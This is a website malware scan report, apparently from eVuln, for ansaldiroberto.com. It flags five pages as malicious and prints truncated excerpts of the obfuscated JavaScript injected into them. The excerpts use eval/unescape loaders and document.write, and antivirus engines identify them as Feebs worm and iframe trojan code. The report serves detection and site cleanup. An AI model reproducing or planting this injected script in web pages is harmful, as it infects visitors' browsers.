New scan:

Malware Scanner report for ansaldiroberto.com

Malicious/Suspicious/Total urls checked
5/0/15
5 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://ansaldiroberto.com/
200 OK
Content-Length: 1865
Content-Type: text/html
clean
http://ansaldiroberto.com/aligocydi.html
200 OK
Content-Length: 321
Content-Type: text/html
clean
http://ansaldiroberto.com/test404page.js
404 Not Found
Content-Length: 518
Content-Type: text/html
clean
http://ansaldiroberto.com/amlopres-z.html
200 OK
Content-Length: 44806
Content-Type: text/html
clean
http://afterpill.ru/js/jquery.js
500 timeout
Content-Length: 30
Content-Type: text/plain
clean
http://ansaldiroberto.com/atrovent.html
403 Forbidden
Content-Length: 521
Content-Type: text/html
clean
http://ansaldiroberto.com/aviny.html
200 OK
Content-Length: 259
Content-Type: text/html
clean
http://ansaldiroberto.com/cgi-bin/
403 Forbidden
Content-Length: 516
Content-Type: text/html
clean
http://ansaldiroberto.com/chrystal.html
200 OK
Content-Length: 11771
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

eval(unescape('f%75nction%20n%39%37%51%42\125%20%20%20%20%28\165\113%34%6A\150\120Ga%36M%32%6CdH%31%29%7Br%34%30%32%35%6A\113%6A\126\123j\143%3D\165%4B%34\152h\120Ga%36M%32%6Cd\110%31%7D%3B'));rnNhBrLtGtlNy='l' ;cjX6ODk+='p7uK6vc4zv2Adhe' ;p2oWy1B[0]+='l*mv,p,q{li{u8tUyMyOyQrxFv ~EyjtAdzOqGys[tzY1[pm,qsnxecwlRkeR|Hy8s3lSyee~Wv`w`u~Fw3kqv(vYx\njk1lwlyx+j|eoO(u~f,vu7xj/tSjs~kTj7z%~j:j<q|irw5k.wzvj/pO{v ~k,lpk9j9jjOj?vvjSj2k3j4jujExfjYj;v ~
... 3122 bytes are skipped ...
50%3Bi%69%2B%2B%29%7BlO%2B%3D\154%33%28p%32%6F%57\171%31\102%5B\151i%5D%29%7D%3B\154%36\142%38\141\143%36%37f%39%66%28%29%3B' ;i9uWnudk54 ='OOhrEONOvMjmgCTBHfvBtHNTjOsX' ;qF7u2oYdq1wbJ='kI03H2w13x' ;w049m0JYjcHv346q (yulH3LhUKQoX741);cHv346qw049m0JYj (qxZS473XYJ7R43);n97QBU (qxZS473XYJ7R43);o38iRr2IxdH5Wn8='vjDJ5wc2fj0fy3H3es7e7DDy' ;eval(unescape('%71%79%36%28%29%3B'));rnNhBrLtGtlNy+='rhmQEknosQONOwmOjwVRgvMfPaYBOGQRPPfnLOOOuDdOOGyEQMpHOhUCnuXp' ;cjX6ODk+='s9CJ8bJ8' ;

Antivirus reports:

Avast
VBS:Malware-gen
eSafe
JS.Feebs.ks
GData
VBS:Malware-gen

http://ansaldiroberto.com/corrianne.html
200 OK
Content-Length: 14046
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

l1l=document.all;var e9f76ca=true;ll1=document.layers;lll=window.sidebar;e9f76ca=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');e9f76ca|=lII;yjg5B2Gd4otRlP7=new Array();yjg5B2Gd4otRlP7[0]='%76c\162%49A%35%33';huI9pdwT48S2Nc9=new Array();huI9pdwT48S2Nc9[0]=' <html lang="en" id~ facebook~c~ss~ no_js">~ead~(s
... 3134 bytes are skipped ...
4%38S%32N%63%39%2E%6Cengt%68%3B%69\151%2B%2B%29%7Bl\117%2B%3D%6C%33%28%68\165I%39\160d%77\124%34%38%53%32\116\143%39%5Bii%5D%29%7D%3B\151f%28e%39f%37%36%63a%29%7Bd\157c\165ment%2E%77\162i%74\145%28lO%29%7D%3B';mG7v72 ='OjBnLedHvOBRftOPFrvuEQthuOYP';elNJcZRl7p2OQs='v1G437';xVUl0ksmP3Rqg8xL (cU110m5);smP3Rqg8xLxVUl0k (pfFT7hx1TGu13);qJt1dQJeEAB2='y45ca7BrjA7Nj2g1c6dOrnkF2';eval(unescape('%71%79%36%28%29%3B'));bY3ub4Y5WJY3l8+= 'OMutUlOpDahiIURHYFeqMIOSjGOXrexOIaPepRwMOOLOgonxmVoNVkUlbugd';

Antivirus reports:

Avast
JS:Decode-BDC [Trj]
Rising
JS:Worm.Feebs.ik!291719

http://ansaldiroberto.com/crystal.html
200 OK
Content-Length: 14011
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

l1l=document.all;var e9f76ca=true;ll1=document.layers;lll=window.sidebar;e9f76ca=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');e9f76ca|=lII;xw7HCAhli6VNp7I=new Array();xw7HCAhli6VNp7I[0]='%69%33%30%67%35\151%34';fzF7d6Ka7374m4S=new Array();fzF7d6Ka7374m4S[0]=' <html lang="en" id~ facebook~c~ss~ no_js">~ead
... 3133 bytes are skipped ...
74h%3B%69%69%2B%2B%29%7B\154\117%2B%3D%6C%33%28\146%7AF%37d%36\113%61%37%33%37%34\155%34S%5B%69i%5D%29%7D%3B\151\146%28e%39\146%37%36c\141%29%7Bd\157%63\165m%65%6Et%2E%77\162%69\164\145%28lO%29%7D%3B';sYkV0k ='aFVfTrvTUstjOOqflEgttEfSrofq';aqwmv85zCgS77E='b4O84a';b2R5GcK42k9w671e97 (fFl7B8Z);w671e97b2R5GcK42k9 (xzOLzUHhy2B82);mR7vG5l9Eun692YbK='w7440sWBe5V526JDDvX4kEqy4';eval(unescape('%71%79%36%28%29%3B'));fX5k4hM1G5t3i0+= 'OaDMlMwHVcOsOLvwFSOPeYoJOjpbyxobYdTwgyFOZEGueGPnDrIqLutCYJha';

Antivirus reports:

Avast
JS:Decode-BDC [Trj]
Rising
JS:Worm.Feebs.ik!291719

http://ansaldiroberto.com/danell.html
200 OK
Content-Length: 13997
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

l1l=document.all;var e87e9f=true;ll1=document.layers;lll=window.sidebar;e87e9f=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');e87e9f|=lII;jXLFSm2G=new Array();tWyBkJgi=new Array();tWyBkJgi[0]='\145%38%48D%33I%34%31%35' ;jXLFSm2G[0]=' <html lang="en" id~ facebook~c~ss~ no_js">~ead~(script>eval
... 3142 bytes are skipped ...
5B%30%5D%3Dl%69%3Dl%30%5Bl%37%5B%30%5D%5D%3Bl\154%3Dl%37%5B%30%5D%3B%5F\154%3D%31%3B\166ar%20l%5F%3D\154%37%2E%6Cen\147\164\150%2D%31%3Bw\150i\154\145%28%5Fl%3Cl%5F%29%7B%73%77%69t\143h%28l%37%5B%5F%6C%5D%3C\111\154%3F%31%3A%30%29%7Bc\141%73%65%20%30%20%3Al%30%5BI%6C%5D%3D%6C%30%5B\154%6C%5D%2B%53%74\162%69%6Eg%28%6C%30%5B\154l%5D%29%2Es\165\142%73\164r%28%30%2C%31%29%3B\154%31%5B%5F%6C%5D%3D\154%30%5BI\154%5D%3B%69f%28%6C%32%29%7Bl%69%2B%3D%6C%30%5BIl%5D%7D%3B\142\162\145a%6B%3B\144%65%66au' ;

Antivirus reports:

TrendMicro-HouseCall
TROJ_GEN.F47V1231
DrWeb
JS.IFrame.508
NANO-Antivirus
Trojan.Script.Agent.cmpztx

http://ansaldiroberto.com/diane.html
200 OK
Content-Length: 13997
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

l1l=document.all;var e87e9f=true;ll1=document.layers;lll=window.sidebar;e87e9f=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');e87e9f|=lII;jXLFSm2G=new Array();tWyBkJgi=new Array();tWyBkJgi[0]='\145%38%48D%33I%34%31%35' ;jXLFSm2G[0]=' <html lang="en" id~ facebook~c~ss~ no_js">~ead~(script>eval
... 3142 bytes are skipped ...
5B%30%5D%3Dl%69%3Dl%30%5Bl%37%5B%30%5D%5D%3Bl\154%3Dl%37%5B%30%5D%3B%5F\154%3D%31%3B\166ar%20l%5F%3D\154%37%2E%6Cen\147\164\150%2D%31%3Bw\150i\154\145%28%5Fl%3Cl%5F%29%7B%73%77%69t\143h%28l%37%5B%5F%6C%5D%3C\111\154%3F%31%3A%30%29%7Bc\141%73%65%20%30%20%3Al%30%5BI%6C%5D%3D%6C%30%5B\154%6C%5D%2B%53%74\162%69%6Eg%28%6C%30%5B\154l%5D%29%2Es\165\142%73\164r%28%30%2C%31%29%3B\154%31%5B%5F%6C%5D%3D\154%30%5BI\154%5D%3B%69f%28%6C%32%29%7Bl%69%2B%3D%6C%30%5BIl%5D%7D%3B\142\162\145a%6B%3B\144%65%66au' ;

Antivirus reports:

TrendMicro-HouseCall
TROJ_GEN.F47V1231
DrWeb
JS.IFrame.508
NANO-Antivirus
Trojan.Script.Agent.cmpztx

http://ansaldiroberto.com/egohify.html
200 OK
Content-Length: 281
Content-Type: text/html
clean
http://ansaldiroberto.com/inabedyna.html
200 OK
Content-Length: 227
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: ansaldiroberto.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 08 Jan 2015 07:25:38 GMT
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 1865
Content-Type: text/html;charset=ISO-8859-1

...1865 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: ansaldiroberto.com
Referer: http://www.google.com/search?q=ansaldiroberto.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=ansaldiroberto.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ansaldiroberto.com/

Result: ansaldiroberto.com is not infected or malware details are not published yet.